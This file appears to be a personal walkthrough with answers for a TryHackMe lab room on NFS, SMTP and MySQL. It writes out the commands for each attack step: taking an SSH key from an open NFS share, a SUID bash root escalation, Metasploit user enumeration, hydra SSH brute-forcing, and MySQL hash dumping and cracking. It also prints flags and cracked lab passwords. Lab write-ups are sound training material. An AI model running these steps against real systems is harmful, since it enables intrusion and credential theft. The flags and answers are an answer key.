-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathNetwork Services 2
360 lines (227 loc) · 11.4 KB
/
Network Services 2
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
#Task 2 Understanding NFS
- What does NFS stand for?
Network File System
- What process allows an NFS client to interact with a remote directory as though it was a physical device?
mounting
- What does NFS use to represent files and directories on the server?
file handle
- What protocol does NFS use to communicate between the server and client?
RPC
- What two pieces of user data does the NFS server take as parameters for controlling user permissions? Format: parameter 1 / parameter 2
user id / group id
- Can a Windows NFS server share files with a Linux client? (Y/N)
Y
- Can a Linux NFS server share files with a MacOS client? (Y/N)
Y
- What is the latest version of NFS? [released in 2016, but is still up to date as of 2020] This will require external research.
hint: https://en.wikipedia.org/wiki/Network_File_System
4.2
#Task 3 Enumerating NFS
- Conduct a thorough port scan scan of your choosing, how many ports are open?
hint: nmap -A -p- -Pn -vv $ip
7
- Which port contains the service we're looking to enumerate?
2049
- Now, use /usr/sbin/showmount -e [IP] to list the NFS shares, what is the name of the visible share?
hint: #showmount -e $IP
/home
Time to mount the share to our local machine!
First, use "mkdir /tmp/mount" to create a directory on your machine to mount the share to. This is in the /tmp directory- so be aware that it will be removed on restart.
- Then, use the mount command we broke down earlier to mount the NFS share to your local machine. Change directory to where you mounted the share- what is the name of the folder inside?
hint: cd /tmp/mount
ls
cappuchino
- Interesting! Let's do a bit of research now, have a look through the folders. Which of these folders could contain keys that would give us remote access to the server?
.ssh
- Which of these keys is most useful to us?
id_rsa
- Copy this file to a different location your local machine, and change the permissions to "600" using "chmod 600 [file]".
Assuming we were right about what type of directory this is, we can pretty easily work out the name of the user this key corresponds to.
Can we log into the machine using ssh -i <key-file> <username>@<ip> ? (Y/N)
hint:
cd /tmp/mount/cappuchino
cd .ssh
cat id_rsa.pub
ssh -i id_rsa cappuchino@ip
Y
#Task 4 Exploiting NFS
On local mounted machine target
#wget https://raw.githubusercontent.com/polo-sec/writing/master/Security%20Challenge%20Walkthroughs/Networks%202/bash
#cp bash /tmp/mount/cappuchino
chown root bash
chmod +s bash
ls -l bash
-rwSr-Sr-x 1 root root 1113504 Jul 4 23:12 bash
- Now, we're going to add the SUID bit permission to the bash executable we just copied to the share using "sudo chmod +[permission] bash". What letter do we use to set the SUID bit set using chmod?
s
- Let's do a sanity check, let's check the permissions of the "bash" executable using "ls -la bash". What does the permission set look like? Make sure that it ends with -sr-x.
-rwSr-Sr-x
Now, SSH into the machine as the user. List the directory to make sure the bash executable is there. Now, the moment of truth. Lets run it with "./bash -p". The -p persists the permissions, so that it can run as root with SUID- as otherwise bash will sometimes drop the permissions.
- Great! If all's gone well you should have a shell as root! What's the root flag?
ssh -i id_rsa cappuchino@$ip
./bash -p
cat /root/root.txt
THM{nfs_got_pwned}
#Task 5 Understanding SMTP
- What does SMTP stand for?
Simple Mail Transfer Protocol
- What does SMTP handle the sending of?
emails
- What is the first step in the SMTP process?
SMTP handshake
- What is the default SMTP port?
25
- Where does the SMTP server send the email if the recipient's server is not available?
smtp queue
- On what server does the Email ultimately end up on?
POP/IMAP
- Can a Linux machine run an SMTP server? (Y/N)
Y
- Can a Windows machine run an SMTP server? (Y/N)
Y
#Task 6 Enumerating SMTP
- First, lets run a port scan against the target machine, same as last time. What port is SMTP running on?
hint: nmap -sSVC -Pn -vv $IP
25
- Okay, now we know what port we should be targeting, let's start up Metasploit. What command do we use to do this?
If you would like some more help, or practice using, Metasploit, Darkstar has an amazing room on Metasploit that you can check out here:
https://tryhackme.com/room/rpmetasploit
msfconsole
- Let's search for the module "smtp_version", what's it's full module name?
hint: msfconsole>search smtp_version
auxiliary/scanner/smtp/smtp_version
- Great, now- select the module and list the options. How do we do this?
options
- Have a look through the options, does everything seem correct? What is the option we need to set?
RHOSTS
- Set that to the correct value for your target machine. Then run the exploit. What's the system mail name?
hint: set rhosts 10.10.131.113
set threads 32
run
polosmtp.home
- What Mail Transfer Agent (MTA) is running the SMTP server? This will require some external research.
hint: https://afreshcloud.com/sysadmin/mail-terminology-mta-mua-msa-mda-smtp-dkim-spf-dmarc
Postfix
- Good! We've now got a good amount of information on the target system to move onto the next stage. Let's search for the module "smtp_enum", what's it's full module name?
hint: msfconsole>search smtp_enum
auxiliary/scanner/smtp/smtp_enum
We're going to be using the "top-usernames-shortlist.txt" wordlist from the Usernames subsection of seclists (/usr/share/wordlists/SecLists/Usernames if you have it installed).
Seclists is an amazing collection of wordlists. If you're running Kali or Parrot you can install seclists with: "sudo apt install seclists" Alternatively, you can download the repository from here.
- What option do we need to set to the wordlist's path?
hint: apt install seclists
find / -type f -name "top-usernames-shortlist.txt" 2>/dev/null
user_file
- Once we've set this option, what is the other essential paramater we need to set?
rhosts
- Okay! Now that's finished, what username is returned?
hint: set user_file /usr/share/seclists/Usernames/top-usernames-shortlist.txt
set threads 32
run
administrator
#Task 7 Exploiting SMTP
- What is the password of the user we found during our enumeration stage?
hint: hydra -t 16 -l administrator -P /usr/share/wordlists/rockyou.txt -vV 10.10.131.113 ssh
[22][ssh] host: 10.10.131.113 login: administrator password: alejandro
alejandro
- Great! Now, let's SSH into the server as the user, what is contents of smtp.txt
hint: ssh [email protected]
cat smtp.txt
THM{who_knew_email_servers_were_c00l?}
#Task 8 Understanding MySQL
- What type of software is MySQL?
relational database management system
- What language is MySQL based on?
SQL
- What communication model does MySQL use?
client-server
- What is a common application of MySQL?
back end database
- What major social network uses MySQL as their back-end database? This will require further research.
hint: google search "Cambridge Analytica scandal?"
faebook
#Task 9 Enumerating MySQL
- As always, let's start out with a port scan, so we know what port the service we're trying to attack is running on. What port is MySQL using?
hint: nmap -sSVC -Pn -vv $IP
3306
- Good, now- we think we have a set of credentials. Let's double check that by manually connecting to the MySQL server. We can do this using the command "mysql -h [IP] -u [username] -p"
hint: sudo apt install default-mysql-client
mysql -h 10.10.104.79 -u root -p
- Okay, we know that our login credentials work. Lets quit out of this session with "exit" and launch up Metasploit.
- We're going to be using the "mysql_sql" module.
Search for, select and list the options it needs. What three options do we need to set? (in descending order).
hint: msfconsole>search mysql_sql
use auxiliary/admin/mysql/mysql_sql
show options
password/rhosts/username
- Run the exploit. By default it will test with the "select version()" command, what result does this give you?
set passwrod password
set rhosts 10.10.104.79
set username root
run
5.7.29-0ubuntu0.18.04.1
- Great! We know that our exploit is landing as planned. Let's try to gain some more ambitious information. Change the "sql" option to "show databases". how many databases are returned?
mysql>show databases;
or msfconsole>set sql show databases
run
4
#Task 10 Exploiting MySQL
- First, let's search for and select the "mysql_schemadump" module. What's the module's full name?
hint: msfconsole>search mysql_schemadump
auxiliary/scanner/mysql/mysql_schemadump
- Great! Now, you've done this a few times by now so I'll let you take it from here. Set the relevant options, run the exploit. What's the name of the last table that gets dumped?
hint:mfs6>use auxiliary/scanner/mysql/mysql_schemadump
show options
set password password
set rhosts 10.10.104.79
set threads 32
set username root
run
x$waits_global_by_latency
- Awesome, you have now dumped the tables, and column names of the whole database. But we can do one better... search for and select the "mysql_hashdump" module. What's the module's full name?
hint: msf6>search mysql_hashdump
auxiliary/scanner/mysql/mysql_hashdump
- Again, I'll let you take it from here. Set the relevant options, run the exploit. What non-default user stands out to you?
hint: msf6>set auxiliary/scanner/mysql/mysql_hashdump
show options
set password password
set rhosts 10.10.104.79
set threads 32
set username root
run
[+] 10.10.104.79:3306 - Saving HashString as Loot: root:
[+] 10.10.104.79:3306 - Saving HashString as Loot: mysql.session:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE
[+] 10.10.104.79:3306 - Saving HashString as Loot: mysql.sys:*THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE
[+] 10.10.104.79:3306 - Saving HashString as Loot: debian-sys-maint:*D9C95B328FE46FFAE1A55A2DE5719A8681B2F79E
[+] 10.10.104.79:3306 - Saving HashString as Loot: root:*2470C0C06DEE42FD1618BB99005ADCA2EC9D1E19
[+] 10.10.104.79:3306 - Saving HashString as Loot: carl:*EA031893AA21444B170FC2162A56978B8CEECE18
[*] 10.10.104.79:3306 - Scanned 1 of 1 hosts (100% complete)
carl
Another user! And we have their password hash. This could be very interesting. Copy the hash string in full, like: bob:*HASH to a text file on your local machine called "hash.txt".
- What is the user/hash combination string?
hint: above copy
vi hash.txt
carl:*EA031893AA21444B170FC2162A56978B8CEECE18
- Now, we need to crack the password! Let's try John the Ripper against it using: "john hash.txt" what is the password of the user we found?
hint: john --wordlist=/usr/share/wordlist/rockyou.txt hash.txt
doggie
Awesome. Password reuse is not only extremely dangerous, but extremely common. What are the chances that this user has reused their password for a different service?
- What's the contents of MySQL.txt
hint: ssh [email protected]
ls
cat MySQL.txt
THM{congratulations_you_got_the_mySQL_flag}
#Task 11 Further Learning
Reading
Here's some things that might be useful to read after completing this room, if it interests you:
https://web.mit.edu/rhel-doc/4/RH-DOCS/rhel-sg-en-4/ch-exploits.html
https://www.nextgov.com/cybersecurity/2019/10/nsa-warns-vulnerabilities-multiple-vpn-services/160456/
Thank you
Thanks for taking the time to work through this room, I wish you the best of luck in future.
~ Polo
Answer the questions below
Congratulations! You did it!
Thanks Polo
https://tryhackme.com/room/networkservices2
https://fthcyber.com/2020/10/02/network-services-2-writeup-tryhackme/
http://wuvel.net/network-services-2/
https://jinshiranai.hashnode.dev/tryhackme-network-services-2-room